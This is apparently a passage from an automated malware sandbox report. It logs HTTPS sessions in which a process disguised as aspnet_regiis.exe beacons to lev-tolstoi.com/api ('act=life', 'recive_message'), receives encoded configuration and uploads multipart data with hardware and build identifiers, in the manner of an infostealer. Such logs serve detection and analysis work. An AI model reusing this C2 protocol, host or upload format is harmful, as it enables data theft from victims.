                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                2024-12-28 21:05:08 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:08 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=8ithog9sh5p9opd1oc2sira1cl; expires=Wed, 23 Apr 2025 14:51:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuPUmaMzttCCUOT%2FWYg8nEpA0xc8pcDqXH9%2BC2daSYLB78esXAB%2BQPixrkqyCn7PJAZ2L5JKmVhryQdC7dL260HK28E4ehWJbrLtKtrhIi0siTSQVSePx8y4UhnqAbGV4ik%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f9481b92ffb43d7-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1766&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1600000&cwnd=208&unsent_bytes=0&cid=2af7491308612902&ts=785&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                                                2024-12-28 21:05:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.549706172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:09 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 86
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:09 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--5defa06fc6ab&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:10 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=49cvfcll8dokvk516o2dn378e8; expires=Wed, 23 Apr 2025 14:51:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRfxRio8UjRomMAeiDqkZhTib4KiMeTEKX33%2BsXnzFmZlvdyOXPEmgtPFEJYoBdQHviNNmXlXmddNeGH1XMgWXdKQVg0jwGdPWzJAd250tDpNf4umDBWwsvjS2GGOd6riQE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f9481c5cc7f19b6-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1968&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=985&delivery_rate=1444114&cwnd=170&unsent_bytes=0&cid=c9a697e0c70b1713&ts=781&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC250INData Raw: 32 64 38 61 0d 0a 43 75 34 51 4d 37 4b 68 79 58 54 6e 52 69 50 61 4a 6b 46 4e 58 7a 78 71 56 72 48 76 4a 63 50 6b 70 64 31 46 4d 42 4f 75 35 2b 42 78 7a 47 59 52 69 4a 58 6c 56 70 51 6a 41 65 42 41 49 43 45 73 57 55 5a 30 30 49 73 48 2b 59 4c 45 73 54 5a 56 50 34 79 52 6a 53 6a 55 64 6c 4c 65 30 71 78 59 78 53 4e 62 2b 42 77 61 4e 6e 31 5a 42 48 53 4c 7a 55 43 70 68 73 53 78 4a 31 46 34 77 5a 65 4d 61 59 5a 38 56 4e 72 45 71 68 43 47 4b 6b 36 2f 51 79 51 73 4e 56 49 44 4f 39 6d 43 42 2b 2f 47 77 4b 64 6e 43 6a 48 6a 67 70 52 72 6f 33 46 41 32 59 4f 30 57 4a 78 6b 52 72 51 45 65 32 38 2b 57 51 67 36 31 34 74 4f 71 34 7a 4e 75 53 5a 55 65 64 36 4f 68 6d 4b 47 63 6c 66 62 7a 71 4d 45 69 79 42 4a 74 45 55 75 4c 48 30 51 53 44 50 4c 7a 52 2f 68
                                                                                                                                                                                                                                                                Data Ascii: 2d8aCu4QM7KhyXTnRiPaJkFNXzxqVrHvJcPkpd1FMBOu5+BxzGYRiJXlVpQjAeBAICEsWUZ00IsH+YLEsTZVP4yRjSjUdlLe0qxYxSNb+BwaNn1ZBHSLzUCphsSxJ1F4wZeMaYZ8VNrEqhCGKk6/QyQsNVIDO9mCB+/GwKdnCjHjgpRro3FA2YO0WJxkRrQEe28+WQg614tOq4zNuSZUed6OhmKGclfbzqMEiyBJtEUuLH0QSDPLzR/h
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 31 66 57 38 4e 6b 4e 6b 77 5a 57 45 4b 4a 4d 38 53 4a 44 45 70 31 62 64 5a 45 6d 30 53 69 59 73 4d 6c 6b 4a 4e 4d 47 43 52 36 4b 4f 7a 37 73 74 58 58 37 44 69 34 68 76 68 48 74 57 33 38 53 6a 45 49 6f 6e 41 66 59 45 4a 44 64 39 42 6b 67 55 77 34 35 45 74 59 76 57 2f 7a 67 63 61 49 79 43 6a 69 6a 55 4d 6c 66 65 77 71 59 57 6c 79 78 4b 73 30 45 78 4a 44 52 54 42 54 54 65 68 30 69 69 68 73 43 31 4c 56 31 37 79 49 69 50 62 6f 78 79 45 5a 36 44 72 41 37 46 66 41 47 62 51 54 4d 6f 4d 55 68 4b 44 70 4f 53 43 62 6a 47 77 4c 4e 6e 43 6a 48 45 67 49 46 72 68 33 31 53 32 4d 69 35 46 70 63 69 54 4c 31 57 4a 53 6f 7a 56 41 73 6d 32 59 4e 42 6f 6f 2f 4d 74 69 4a 56 64 59 7a 4c 77 6d 2b 55 4d 67 6d 51 34 71 59 64 69 53 35 57 75 41 51 38 59 53 51 65 44 7a 69 54 31 51 65
                                                                                                                                                                                                                                                                Data Ascii: 1fW8NkNkwZWEKJM8SJDEp1bdZEm0SiYsMlkJNMGCR6KOz7stXX7Di4hvhHtW38SjEIonAfYEJDd9BkgUw45EtYvW/zgcaIyCjijUMlfewqYWlyxKs0ExJDRTBTTeh0iihsC1LV17yIiPboxyEZ6DrA7FfAGbQTMoMUhKDpOSCbjGwLNnCjHEgIFrh31S2Mi5FpciTL1WJSozVAsm2YNBoo/MtiJVdYzLwm+UMgmQ4qYdiS5WuAQ8YSQeDziT1Qe
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 32 6b 53 64 74 54 46 32 69 69 39 5a 56 71 53 39 71 67 59 69 79 4e 58 2b 46 74 74 4e 6e 31 5a 42 48 53 4c 7a 55 71 70 67 38 4b 77 4a 6c 68 2f 79 59 2b 4f 59 49 4a 78 51 39 2f 48 71 78 71 4e 4c 6b 79 32 51 43 73 6d 4e 6c 55 4f 4e 4e 4b 48 42 2b 2f 47 77 4b 64 6e 43 6a 48 34 67 6f 35 6c 67 7a 42 6b 30 38 32 6c 45 5a 4e 6b 58 76 5a 64 59 79 67 78 48 6c 42 30 33 34 52 48 71 6f 7a 44 76 79 42 66 64 4d 2b 43 67 57 57 4c 65 46 2f 58 78 36 63 66 69 43 4a 42 76 30 41 6d 50 54 68 58 42 44 69 54 77 77 65 6d 6e 6f 66 6e 5a 33 31 32 32 6f 61 74 61 35 31 37 45 63 2b 4e 73 6c 61 43 4b 41 48 67 42 43 51 71 4e 56 55 4f 50 4e 4f 66 51 71 2b 4e 78 72 55 68 55 33 7a 41 67 34 4a 70 6a 48 52 64 30 4d 53 73 42 4a 63 68 52 36 70 4f 59 32 46 39 57 52 42 30 69 38 31 78 73 5a 48 57
                                                                                                                                                                                                                                                                Data Ascii: 2kSdtTF2ii9ZVqS9qgYiyNX+FttNn1ZBHSLzUqpg8KwJlh/yY+OYIJxQ9/HqxqNLky2QCsmNlUONNKHB+/GwKdnCjH4go5lgzBk082lEZNkXvZdYygxHlB034RHqozDvyBfdM+CgWWLeF/Xx6cfiCJBv0AmPThXBDiTwwemnofnZ3122oata517Ec+NslaCKAHgBCQqNVUOPNOfQq+NxrUhU3zAg4JpjHRd0MSsBJchR6pOY2F9WRB0i81xsZHW
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 6a 44 6a 59 70 6e 67 33 5a 66 31 73 57 6d 45 34 6f 75 55 37 42 4b 4c 69 51 79 56 52 6f 30 33 6f 6c 4c 70 59 37 4d 74 57 63 63 4d 63 75 64 77 6a 44 4d 52 31 7a 66 77 36 67 41 78 54 73 50 6f 51 51 6b 49 33 30 47 53 44 6a 64 6a 55 69 74 69 73 79 33 4a 6c 35 2f 79 34 43 4c 59 49 52 67 55 4e 54 4c 71 68 69 4b 4a 55 57 39 51 53 63 6f 4f 56 67 48 64 4a 33 4e 51 4c 6e 47 6e 2f 38 49 64 55 53 4f 70 4c 67 6f 6b 7a 78 49 6b 4d 53 6e 56 74 31 6b 54 62 74 49 4b 79 41 37 56 77 51 2b 32 6f 5a 4c 71 6f 4c 4c 74 69 4a 55 63 4d 6d 41 67 32 79 41 65 46 66 54 77 4b 51 5a 69 69 77 42 39 67 51 6b 4e 33 30 47 53 42 48 45 68 6b 6d 6e 78 74 6a 78 50 68 4a 32 77 4d 58 61 4b 49 42 37 56 39 62 47 70 78 65 44 4c 45 53 77 51 43 49 70 4f 31 30 48 4d 4e 61 4d 53 4b 57 4b 79 62 55 6d 55
                                                                                                                                                                                                                                                                Data Ascii: jDjYpng3Zf1sWmE4ouU7BKLiQyVRo03olLpY7MtWccMcudwjDMR1zfw6gAxTsPoQQkI30GSDjdjUitisy3Jl5/y4CLYIRgUNTLqhiKJUW9QScoOVgHdJ3NQLnGn/8IdUSOpLgokzxIkMSnVt1kTbtIKyA7VwQ+2oZLqoLLtiJUcMmAg2yAeFfTwKQZiiwB9gQkN30GSBHEhkmnxtjxPhJ2wMXaKIB7V9bGpxeDLESwQCIpO10HMNaMSKWKybUmU
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 51 62 34 4e 32 56 74 7a 46 70 42 43 45 49 55 75 30 51 79 59 6b 4d 6c 4a 49 65 70 4f 4b 58 2b 48 65 68 35 45 73 51 57 62 50 69 34 6c 2b 6c 7a 4a 4f 6e 74 72 72 45 59 6c 6b 47 66 68 48 4b 43 51 35 58 67 51 30 31 34 42 48 73 34 6e 41 75 43 35 5a 59 38 61 43 68 57 4f 45 65 56 37 57 30 61 63 59 6c 79 46 54 71 67 52 74 62 7a 70 47 53 47 79 54 75 30 43 78 6c 73 54 39 46 6b 52 79 32 6f 36 50 5a 4d 78 74 48 38 6d 44 72 42 72 46 66 41 47 2b 53 79 6f 73 4d 6c 38 42 4f 4e 36 49 54 71 53 48 77 62 73 74 57 48 48 4b 67 34 4e 74 68 6e 46 51 32 73 71 73 48 6f 49 6e 55 2f 67 4b 59 79 67 6c 48 6c 42 30 2b 6f 70 56 72 35 61 48 6f 47 6c 4c 4d 63 75 4a 77 6a 44 4d 64 6c 76 66 78 36 77 61 67 79 46 48 74 55 55 73 4c 6a 31 52 44 44 2f 61 69 30 61 73 67 38 71 37 4e 56 68 36 77 34
                                                                                                                                                                                                                                                                Data Ascii: Qb4N2VtzFpBCEIUu0QyYkMlJIepOKX+Heh5EsQWbPi4l+lzJOntrrEYlkGfhHKCQ5XgQ014BHs4nAuC5ZY8aChWOEeV7W0acYlyFTqgRtbzpGSGyTu0CxlsT9FkRy2o6PZMxtH8mDrBrFfAG+SyosMl8BON6ITqSHwbstWHHKg4NthnFQ2sqsHoInU/gKYyglHlB0+opVr5aHoGlLMcuJwjDMdlvfx6wagyFHtUUsLj1RDD/ai0asg8q7NVh6w4
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 65 46 54 61 7a 71 67 5a 68 6a 5a 41 76 6c 59 6a 49 6a 64 4d 41 6a 2f 57 67 45 71 73 68 63 47 35 4c 46 35 6a 78 59 57 42 59 38 77 38 45 64 66 62 36 30 37 46 42 31 61 75 54 69 51 6a 4b 31 55 4a 4e 38 57 41 56 2b 48 49 68 36 34 67 51 7a 47 55 6b 35 4a 2f 69 32 30 66 79 59 4f 73 47 73 56 38 41 62 35 4e 4a 53 67 37 55 42 6f 78 31 59 4a 49 71 49 2f 44 74 79 52 53 64 63 69 43 68 32 75 41 65 56 62 54 7a 4b 38 66 69 79 31 4f 2b 41 70 6a 4b 43 55 65 55 48 54 79 6c 6b 53 74 69 34 65 67 61 55 73 78 79 34 6e 43 4d 4d 78 2b 58 39 58 44 6f 52 43 42 49 55 65 79 51 53 4d 6b 50 6c 45 4d 4d 74 65 43 52 36 71 50 78 72 6b 69 57 48 72 4b 69 49 46 75 69 6a 49 66 6b 4d 53 7a 56 74 31 6b 59 61 4e 4a 4c 79 68 39 51 55 59 74 6b 34 70 4c 34 64 36 48 74 43 74 57 64 73 79 49 67 57 43
                                                                                                                                                                                                                                                                Data Ascii: eFTazqgZhjZAvlYjIjdMAj/WgEqshcG5LF5jxYWBY8w8Edfb607FB1auTiQjK1UJN8WAV+HIh64gQzGUk5J/i20fyYOsGsV8Ab5NJSg7UBox1YJIqI/DtyRSdciCh2uAeVbTzK8fiy1O+ApjKCUeUHTylkSti4egaUsxy4nCMMx+X9XDoRCBIUeyQSMkPlEMMteCR6qPxrkiWHrKiIFuijIfkMSzVt1kYaNJLyh9QUYtk4pL4d6HtCtWdsyIgWC
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 39 4b 39 47 35 55 6a 41 59 63 4b 59 7a 64 39 42 6b 67 42 30 49 4e 4a 70 70 44 57 38 67 42 45 65 38 75 56 68 58 2b 44 4d 68 2b 51 78 65 74 4f 31 6d 6f 42 76 46 56 6a 64 32 30 4d 55 32 47 41 32 68 66 7a 6d 59 6d 6d 5a 30 51 78 6c 4e 66 4d 4b 4a 34 79 43 5a 43 45 71 41 53 58 49 6b 4b 75 52 32 51 52 41 33 6b 53 4f 64 57 61 56 70 2b 34 77 4b 55 71 56 47 62 64 79 5a 64 72 67 6e 78 57 78 6f 50 6c 56 6f 70 6b 47 59 45 45 61 32 38 43 45 45 67 73 6b 39 55 48 6c 49 58 4a 73 53 42 45 59 49 47 69 6d 47 57 4b 5a 55 43 51 6a 65 73 51 78 58 77 52 39 67 51 6e 50 6e 30 47 57 47 61 49 32 42 54 32 31 70 57 67 61 55 73 78 32 73 58 61 4f 73 49 79 51 35 43 62 36 31 47 47 4e 6c 4f 2b 52 7a 55 73 65 6d 41 32 47 74 53 4c 51 71 61 57 68 5a 45 73 52 6e 61 4d 79 38 4a 6e 7a 43 70 6f
                                                                                                                                                                                                                                                                Data Ascii: 9K9G5UjAYcKYzd9BkgB0INJppDW8gBEe8uVhX+DMh+QxetO1moBvFVjd20MU2GA2hfzmYmmZ0QxlNfMKJ4yCZCEqASXIkKuR2QRA3kSOdWaVp+4wKUqVGbdyZdrgnxWxoPlVopkGYEEa28CEEgsk9UHlIXJsSBEYIGimGWKZUCQjesQxXwR9gQnPn0GWGaI2BT21pWgaUsx2sXaOsIyQ5Cb61GGNlO+RzUsemA2GtSLQqaWhZEsRnaMy8JnzCpo
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 61 44 5a 42 6e 71 43 6d 4d 72 4c 42 35 51 5a 49 48 57 45 76 4c 52 6c 2b 30 34 48 47 69 4d 6b 38 49 77 33 6a 77 52 77 6f 50 7a 56 73 49 6e 55 36 70 43 49 44 6b 2b 47 54 59 4b 39 49 4e 41 6f 4a 44 58 71 43 67 64 58 2f 71 6b 76 46 61 5a 63 56 2f 65 78 4c 30 48 78 57 6f 42 74 77 52 37 46 6e 30 57 53 41 75 64 7a 56 2f 68 33 6f 65 4b 4a 46 78 2f 79 35 4f 54 4a 61 74 38 56 74 48 56 75 77 47 4b 61 32 2b 4f 5a 57 4e 68 66 56 68 49 62 49 48 44 42 36 57 58 68 2b 64 33 41 43 71 5a 31 74 55 34 33 6d 30 66 79 59 4f 39 56 74 31 32 44 2f 68 57 59 33 64 39 47 51 73 6d 77 59 74 45 74 34 57 41 67 52 6c 31 66 38 75 45 6c 48 69 42 66 6e 44 54 30 71 45 6f 75 7a 46 43 74 6b 6f 6b 4f 53 77 65 52 6e 54 63 7a 52 2b 59 78 6f 2f 2f 47 42 77 78 31 4d 58 61 4b 4c 6c 78 58 39 37 45 76
                                                                                                                                                                                                                                                                Data Ascii: aDZBnqCmMrLB5QZIHWEvLRl+04HGiMk8Iw3jwRwoPzVsInU6pCIDk+GTYK9INAoJDXqCgdX/qkvFaZcV/exL0HxWoBtwR7Fn0WSAudzV/h3oeKJFx/y5OTJat8VtHVuwGKa2+OZWNhfVhIbIHDB6WXh+d3ACqZ1tU43m0fyYO9Vt12D/hWY3d9GQsmwYtEt4WAgRl1f8uElHiBfnDT0qEouzFCtkokOSweRnTczR+Yxo//GBwx1MXaKLlxX97Ev
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 52 76 33 6f 64 41 69 39 5a 47 44 65 52 6f 55 43 73 69 76 6d 42 45 45 4e 32 33 4d 65 6b 61 35 70 78 45 5a 36 44 73 31 62 64 5a 47 79 71 51 7a 4d 73 66 33 49 50 4f 64 2f 4e 57 4f 2b 66 68 36 6c 6e 43 69 4b 43 78 5a 41 6f 31 44 49 57 30 39 47 35 45 49 59 79 51 76 39 36 48 51 49 76 57 52 67 33 6b 62 78 4b 70 5a 44 53 76 44 64 56 54 2f 4b 6f 6b 47 2b 63 63 52 50 31 2b 65 6b 6e 6b 79 64 42 74 6b 4e 6a 59 58 31 47 53 47 79 54 6f 46 57 6d 6c 73 54 39 41 6d 67 7a 2f 5a 4f 42 61 49 4a 31 45 5a 36 44 70 31 62 64 5a 45 79 71 51 7a 4d 73 63 56 6b 53 4d 35 4f 53 43 62 6a 47 30 66 39 2f 41 54 2b 4d 6c 38 49 77 7a 44 56 66 33 63 4b 6f 47 49 59 32 55 37 35 48 4e 53 78 36 59 44 59 62 32 49 78 58 72 4a 66 4b 75 7a 46 73 54 2b 75 44 68 32 2b 79 54 47 62 42 78 4c 74 55 6f 79
                                                                                                                                                                                                                                                                Data Ascii: Rv3odAi9ZGDeRoUCsivmBEEN23Meka5pxEZ6Ds1bdZGyqQzMsf3IPOd/NWO+fh6lnCiKCxZAo1DIW09G5EIYyQv96HQIvWRg3kbxKpZDSvDdVT/KokG+ccRP1+eknkydBtkNjYX1GSGyToFWmlsT9Amgz/ZOBaIJ1EZ6Dp1bdZEyqQzMscVkSM5OSCbjG0f9/AT+Ml8IwzDVf3cKoGIY2U75HNSx6YDYb2IxXrJfKuzFsT+uDh2+yTGbBxLtUoy


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.549707172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:12 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=M7Y72E3D69IRA
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 12812
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:12 UTC12812OUTData Raw: 2d 2d 4d 37 59 37 32 45 33 44 36 39 49 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4d 37 59 37 32 45 33 44 36 39 49 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 37 59 37 32 45 33 44 36 39 49 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a 2d 2d 4d 37 59 37
                                                                                                                                                                                                                                                                Data Ascii: --M7Y72E3D69IRAContent-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--M7Y72E3D69IRAContent-Disposition: form-data; name="pid"2--M7Y72E3D69IRAContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab--M7Y7
                                                                                                                                                                                                                                                                2024-12-28 21:05:13 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:13 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=671ec616gml386q3li3km57gdt; expires=Wed, 23 Apr 2025 14:51:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sjr6tS2RT7zUUyLtKHVuFexWuKLT0D1IZtBZMYsBIOhSproEVJOENA1nqWL72ptVlEVCeSilKZsRlilh3QukbLSPsjNd8q3OMXnUiMGqxVtumEOeEKNEk4H69ddMqWXalvA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f9481d3f8854271-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1683&rtt_var=639&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13746&delivery_rate=1701631&cwnd=252&unsent_bytes=0&cid=9ae67fc8ac579b80&ts=1049&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-28 21:05:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                4192.168.2.549708172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:14 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=J3FFDY4G
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 15024
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:14 UTC15024OUTData Raw: 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                                Data Ascii: --J3FFDY4GContent-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--J3FFDY4GContent-Disposition: form-data; name="pid"2--J3FFDY4GContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab--J3FFDY4GContent-D
                                                                                                                                                                                                                                                                2024-12-28 21:05:15 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:15 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
